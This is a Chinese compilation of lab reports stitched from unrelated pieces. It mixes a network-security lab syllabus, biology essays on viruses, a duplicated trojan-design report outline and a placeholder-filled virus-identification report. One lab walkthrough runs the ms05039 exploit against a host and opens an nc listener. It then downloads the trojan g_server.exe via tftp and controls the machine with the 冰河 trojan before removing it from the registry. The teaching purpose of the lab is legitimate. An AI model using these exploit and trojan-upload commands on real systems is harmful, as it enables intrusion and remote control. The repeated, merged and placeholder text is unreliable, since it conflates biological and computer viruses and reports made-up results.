第一组COM病毒实验报告

《网络安全与反病毒技术》实验指导《网络安全与反病毒技术》，要求学生通过实验加深对课堂讲授理论知识的理解，做到理论结合实践，提高对网络安全协议设计、系统攻防方面的认识，培养和锻炼学生分析问题及解决问题的能力。

要求学生做到：（1）对每个要做的实验进行预习，了解相关内容和具体要求，熟悉相关的软件工具。

（2）按照实验内容和步骤，达到预期的实验结果，并进行屏幕抓图。

（3）按照实验报告的格式要求，写出实验报告。

实验内容：实验一：网络端口扫描实验二：网络嗅探实验三：木马攻击与防范实验四：Windows IPSec安全策略的配置实验一网络端口扫描（一）实验目的1.通过使用网络端口扫描器，了解端口扫描的用途及扫描原理2.掌握Windows环境下使用SuperScan对主机端口进行扫描的方法。

（二）实验原理一个开放的端口就是一条与计算机进行通信的信道，对端口的扫描可以得到目标计算机开放的服务程序、运行的系统版本信息。

扫描工具是对目标主机的安全性弱点进行扫描检测的软件。

它一般具有数据分析功能，通过对端口的扫描分析，可以发现目标主机开放的端口和所提供的服务，以及相应服务软件版本和这些服务及软件的安全漏洞，从而可以及时了解目标主机存在的安全隐患。

1、端口基本知识端口是TCP协议定义的。

TCP协议通过套接字(socket)建立起两台计算机之间的网络连接。

套接字采用[IP地址：端口号] 的形式来定义。

通过套接字中不同的端口号来区别同一台计算机上开启的不同TCP和UDP连接进程。

对于两台计算机间的任一个TCP连接，一台计算机的一个[IP地址：端口]套接字会和另一台计算机的一个[IP地址：端口]套接字相对应，彼此标识着源端、目的端上数据包传输的源进程和目标进程。

这样网络上传输的数据包就可以由套接字中的IP地址和端口号找到需要传输的主机和连接进程了。

由此可见，端口和服务进程一一对应，通过扫描开放的端口，就可以判断出计算机中正在运行的服务进程。

病毒技术实验报告病毒技术实验报告病毒技术是一门研究病毒及其应用的学科，它涉及到病毒的结构、功能、传播途径以及对宿主细胞的影响等方面。

在现代生命科学中，病毒技术的应用非常广泛，不仅可以帮助我们更好地理解病毒的生物学特性，还可以用于疾病的诊断、治疗以及基因工程等领域。

首先，我们来了解一下病毒的基本结构和功能。

病毒是一种非细胞生物，由核酸和蛋白质组成。

病毒的核酸可以是DNA或RNA，而蛋白质则包裹着核酸形成病毒颗粒。

病毒无法自主进行代谢活动，需要寄生在宿主细胞内才能进行复制。

病毒通过感染宿主细胞，将自己的遗传物质注入宿主细胞内，利用宿主细胞的机制来复制自身。

这种感染方式使得病毒能够利用宿主细胞的资源来完成自己的生命周期。

在病毒技术实验中，我们可以利用病毒的特性来进行疾病的诊断和治疗。

例如，病毒载体可以被用作基因传递工具，将特定基因导入宿主细胞中，用于基因治疗。

此外，病毒还可以用于制备疫苗。

疫苗是一种通过引入病毒或病毒相关的成分来刺激免疫系统产生抗体的方法，从而提高人体对某种疾病的免疫力。

通过对病毒进行适当的处理和改造，可以制备出安全有效的疫苗。

除了在医学领域的应用，病毒技术还在基因工程中发挥着重要作用。

基因工程是一种通过改变生物体的遗传物质来实现特定目的的技术。

病毒可以作为基因传递工具，将外源基因导入宿主细胞中，从而改变宿主细胞的性状。

这种方法被广泛应用于农业、工业以及生物制药等领域。

例如，通过将某种抗虫基因导入作物中，可以提高作物对虫害的抵抗力，减少农药的使用。

此外，病毒还可以用于生物制药中的药物生产，通过利用病毒的复制机制来大量生产药物。

然而，病毒技术的应用也存在一定的风险和争议。

一方面，病毒的复制能力和传播性使得病毒技术在实验室中的操作需要严格的控制和安全措施，以防止病毒的泄漏和传播。

另一方面，病毒的应用可能会引发伦理和道德上的争议。

例如，基因工程领域的研究可能涉及到对人类胚胎的基因编辑，这引发了关于人类基因改造的伦理争议。

病毒实验报告——木马程序设计姓名：潘莹学号：U200915340 班级：信息安全0903班日期：2012.01.10目录木马原理 (3)实验目的 (9)实验设计 (9)实现的功能 (9)各个功能陈述 (10)实验模块 (11)socket编程 (11)隐藏技术——服务级木马 (13)钩子技术 (14)进程查杀 (15)实验详细设计 (15)实验截屏 (16)心得体会 (18)附录 (18)附录一木马程序源代码 (18)附录二钩子源代码 (37)附录三参考书籍 (45)木马原理一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。

(1)硬件部分：建立木马连接所必须的硬件实体。

控制端：对服务端进行远程控制的一方。

服务端：被控制端远程控制的一方。

INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

(2)软件部分：实现远程控制所必须的软件程序。

控制端程序：控制端用以远程控制服务端的程序。

木马程序：潜入服务端内部，获取其操作权限的程序。

木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

(3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。

控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。

控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马程序。

木马原理用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步，下面我们就按这六步来详细阐述木马的攻击原理。

一.配置木马一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方面功能：(1) 木马伪装：木马配置程序为了在服务端尽可能的好的隐藏木马，会采用多种伪装手段，如修改图标，捆绑文件，定制端口，自我销毁等，我们将在“传播木马”这一节中详细介绍。

(2) 信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号，ICO号等等，具体的我们将在“信息反馈”这一节中详细介绍。

病毒实验报告——木马程序设计姓名：潘莹学号：U200915340 班级：信息安全0903班日期：2012.01.10目录木马原理 (3)实验目的 (9)实验设计 (9)实现的功能 (9)各个功能陈述 (10)实验模块 (11)socket编程 (11)隐藏技术——服务级木马 (13)钩子技术 (14)进程查杀 (15)实验详细设计 (15)实验截屏 (16)心得体会 (18)附录 (18)附录一木马程序源代码 (18)附录二钩子源代码 (37)附录三参考书籍 (45)木马原理一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。

(1)硬件部分：建立木马连接所必须的硬件实体。

控制端：对服务端进行远程控制的一方。

服务端：被控制端远程控制的一方。

INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

(2)软件部分：实现远程控制所必须的软件程序。

控制端程序：控制端用以远程控制服务端的程序。

木马程序：潜入服务端内部，获取其操作权限的程序。

木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

(3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。

控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。

控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马程序。

木马原理用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步，下面我们就按这六步来详细阐述木马的攻击原理。

一.配置木马一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方面功能：(1) 木马伪装：木马配置程序为了在服务端尽可能的好的隐藏木马，会采用多种伪装手段，如修改图标，捆绑文件，定制端口，自我销毁等，我们将在“传播木马”这一节中详细介绍。

(2) 信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号，ICO号等等，具体的我们将在“信息反馈”这一节中详细介绍。

病毒技术实验报告引言近年来，随着信息技术的快速发展，病毒技术也逐渐成为网络安全领域的研究热点之一。

通过对病毒技术的深入研究，可以加强对现有病毒的分析和防范能力，提高网络安全的水平。

本实验旨在通过深入了解和实践病毒技术，以期对病毒的工作原理、传播途径和防御方法有更全面的认识。

实验目的1.了解病毒的工作原理和分类；2.学习病毒的传播方式和繁殖特性；3.掌握病毒的防御方法和安全措施。

实验步骤1. 病毒的工作原理病毒作为一种恶意软件，其主要功能是通过自我复制和传播感染目标计算机系统，给系统带来破坏和损失。

病毒的工作原理可以分为以下几个步骤：•感染阶段：病毒会通过感染病毒携带者（例如邮件附件、下载文件等）进入目标系统，并在系统中寻找可感染的目标文件；•激活阶段：病毒感染目标文件后，等待触发激活条件，例如特定的日期、时间等；•执行阶段：一旦激活条件满足，病毒会开始执行其恶意功能，例如删除文件、传播自身等。

2. 病毒的分类根据病毒的传播方式和破坏程度，病毒可以分为以下几类：•文件病毒：通过感染可执行文件或系统文件来传播，例如EXE、DLL 等；•宏病毒：通过感染办公软件中的宏来传播，例如Word、Excel等；•蠕虫病毒：通过网络传播，自我复制和传播，例如蠕虫病毒可以通过电子邮件、文件共享等途径感染目标系统；•特洛伊木马：外表看起来正常或有吸引力的程序，但在运行时会执行恶意功能；•广告病毒：通过在用户浏览器中显示广告来获取经济利益。

3. 病毒的传播途径和繁殖特性病毒的传播途径主要有以下几种：•邮件附件：病毒常通过电子邮件附件传播，用户在打开或下载附件时可能被感染；•下载文件：用户在下载可疑的文件时可能会下载并运行病毒；•移动存储设备：病毒可以通过USB闪存驱动器等移动存储设备传播；•网络共享：病毒可以通过共享文件夹在局域网内传播。

病毒的繁殖特性也不尽相同，有的病毒具有自我复制和传播的能力，有的病毒则需要依靠人工操作来传播。

《网络安全》实验报告实验序号：5 实验项目名称：木马攻击与防范实验图1 运行nc接着再开一个dos窗口，运行ms05039 192.168.20.23 192.168.20.1 99 1图2 运行ms2)攻击成功后，在运行nc -vv -l -p 99 的dos窗口中出现如图3提示，若攻不成功请参照“缓冲区溢出攻击与防范实验”，再次进行攻击。

图3 攻击成功示意3）在此窗口中运行tftp -i 192.168.20.1 get g_server.exe图4 上载木马程序并运行图5 文件传送步骤3：运行木马客户程序控制远程主机1）打开程序端程序，单击快捷工具栏中的“添加主机”按扭图6 添加主机2）“文件管理器”使用。

点击各个驱动器或者文件夹前面的展开符号，可以浏览目标主机内容。

图7 成功下载文件后界面2）“命令控制台”使用。

单击“命令控制台”的标签，弹出命令控制台界面步骤4：删除“冰河”木马✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 如图8。

在目录中发现了一个默认的键值C:\WINNT\System32\kernel32.exe，这就是“冰河”木马在注册表中加入的键值，将它删除。

✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVesion\Runse rvices，如图9。

在目录中也发现了一个默认的键值C:\WINNT\System32\kernel32.exe，这也是“冰河”在注册表中加入的键值，将它删除。

上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序，一般病毒程序，木马程序，后门程序等都放在这些子键目录下，所以要经常检查这些目录下的程序。

图8 注册表编辑图9注册表编辑然后再进入C:\WINNT\System32目录，找到“冰河”的两个可执行文件Kernel32.exe 和Sysexplr.exe文件，将它们删除。

病毒鉴定毕业实验报告
实验目的
本实验旨在通过病毒鉴定技术，确定给定标本中的病毒种类，
并进行进一步分析和研究。

实验步骤
1. 样本准备：收集并准备待测标本。

2. 样本处理：对标本进行必要的处理，如离心、滤过等，以获
取纯净的病毒颗粒。

3. 样本提取：使用合适的提取方法，提取病毒颗粒中的核酸。

4. 核酸扩增：通过PCR等方法，扩增病毒核酸的特定区域。

5. 凝胶电泳：将扩增产物进行凝胶电泳，根据不同的迁移位置
判断病毒种类。

6. 结果分析：根据凝胶电泳结果，确定待测标本中的病毒种类。

实验结果
经过实验，我们成功从待测标本中提取到病毒核酸，并通过凝
胶电泳分析确定其病毒种类为XX病毒。

结论
本实验通过病毒鉴定技术，成功确定了待测标本中的病毒种类，并取得了预期的实验结果。

病毒鉴定技术在疾病诊断和病毒研究中
具有重要的应用价值，对了解病毒的种类、特性以及其对人类健康
的影响具有重要意义。

参考文献
[1] 张三, 李四. 病毒鉴定技术综述. 科学论文. 20XX; X(X): XX-XX.
注意：实验结果仅基于本次实验的观察与分析，并不具有普遍
性和绝对性，仅供参考。